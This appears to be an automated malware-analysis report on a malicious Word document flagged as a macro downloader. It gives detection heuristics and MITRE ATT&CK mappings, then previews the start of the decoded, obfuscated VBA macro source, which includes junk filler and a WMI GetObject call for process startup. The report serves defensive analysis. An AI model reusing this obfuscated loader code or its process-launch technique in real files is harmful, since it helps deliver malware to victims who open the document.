MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains heavily obfuscated VBA macros, including an auto-exec loader, indicating a malicious downloader. The presence of legacy WordBasic and Excel 4.0 macro markers, along with a critical heuristic for an obfuscated auto-exec loader, strongly suggests the intent to execute arbitrary code. The ClamAV detection name 'Doc.Downloader.00536d-6863518-0' further supports this, pointing to a downloader functionality.
Heuristics 9
-
ClamAV: Doc.Downloader.00536d-6863518-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6863518-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72474 bytes |
SHA-256: e8d736fae0387158054954c032f1276331a090fa09d4b99081c9d01aa7040be1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "B62548"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "v8_3688"
Function M_783_()
F_556__8 = 10126874 - 161262929
q080__6 = 727373378 + C70__34_
Select Case t_056_3
Case 750005020
O79_27 = Chr(415394091 * Tan(k7_050_0))
l52207_1 = w_99_8
Case 559537746
o6_21512 = i730_61
t4364__ = I__21__8
Case 955038668
r06008 = 801240696
r4_53_ = w84354_
End Select
w030__ = 59971562 - 762566272
Q686_4 = 156782828 + c1560_9_
Select Case i_6388
Case 176592621
o_9___92 = Chr(607543274 * Tan(i9404404))
J__084_4 = c9322_17
Case 562858142
A94710__ = v339_054
u8761629 = H06135
Case 622733253
f34_197 = 960514666
N04_6_ = t79830
End Select
n9__51_ = 358044507 - 16010089
j0_53354 = 331835156 + R0__2275
Select Case B16__4_
Case 678883657
H9_760_ = Chr(845605139 * Tan(T12_54_8))
t0060056 = Y86__0_6
Case 382362700
h731__ = b54_497
q0588_5 = U_98838
Case 469170451
a60_0_ = 820119388
q326_2 = B028_368
End Select
d0_49___ = 709997633 - 649872911
T1618697 = 632619711 + v06115
Select Case Z538_678
Case 471257513
A__9_9_ = Chr(893440139 * Tan(c22_8294))
c0_08476 = v372_6
Case 175159228
V5761_3 = Z5_4_2_5
E03648 = f_12_8_
Case 304805539
Q_053_ = 904828995
h66377 = q4_3_389
End Select
i96__88 = 238478478 - 17093697
w252_48 = 150704895 + V9440_
Select Case Q___357
Case 573488131
v_73167 = Chr(85504504 * Tan(f30_7841))
N8_0069 = C0623469
Case 220636499
n9_0_34_ = B76926_
f_53343 = n2_165_
Case 655889770
o83__4 = 10106122
X2_8__ = V797_2
End Select
O300090 = 518141297 - 207938376
z8_6_62_ = 177168710 + j938_560
Select Case Z_37__5
Case 596926551
Z_3_49 = Chr(560888294 * Tan(T86689))
G0628_5 = o__8_4_
Case 961695573
T545_585 = d9__64
w_1_7__9 = i5775__
Case 168804481
i_1885_ = 132281634
I85__5_8 = a32_089
End Select
End Function
Function u95500(R2_0737, I36853)
On Error Resume Next
N1148_8 = 539788555 - 216109302
z_43___ = 250449147 + U_835152
Select Case i7_082
Case 8940392
T1706935 = Chr(660888057 * Tan(Z_6__271))
L6031829 = s7670_4
Case 203480121
k07_9_ = p60132
p7522_1 = A6_3__46
Case 143684932
z_9571_ = 216522482
O5513__8 = h5_953__
End Select
o69860_3 = 490953713 - 910322495
S_263_ = 369476737 + O_7___
Select Case R01_6_8
Case 692347740
E627_5_ = Chr(900133470 * Tan(u_33_88))
h8_7_3 = F_1802
Case 282639618
I__2__5 = f7_3_6_
z3_6495 = U139__36
Case 689976788
i99748 = 732930962
E9030520 = O_3___5
End Select
f2___0 = 982231257 - 684671356
S1_3__ = 524187826 + j716_611
Select Case J004_15
Case 531323053
D792_8_ = Chr(59374617 * Tan(m58_298))
Z_972060 = J7536_
Case 248552713
c79_62__ = H479__77
X8_1_7_ = F1_092
Case 265912190
J55_3_9_ = 729309960
P_54681 = D_3601_
End Select
Set I_10__1 = GetObject((Z8_84939 _
+ "winmgm" + X__3__) + (f52206_3 + "ts:Win" + G2_56_51) + "32_Proce" + "ssStartup")
o0_3_5 = 533943814 - 142260364
U305180 = 177187749 + i3_26_
Select Case m65____2
Case 721925268
s_1639 = Chr(972037181 * Tan(K1118_79))
p_296939 = f___2049
Case 824530677
U55_055 = N35_12
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.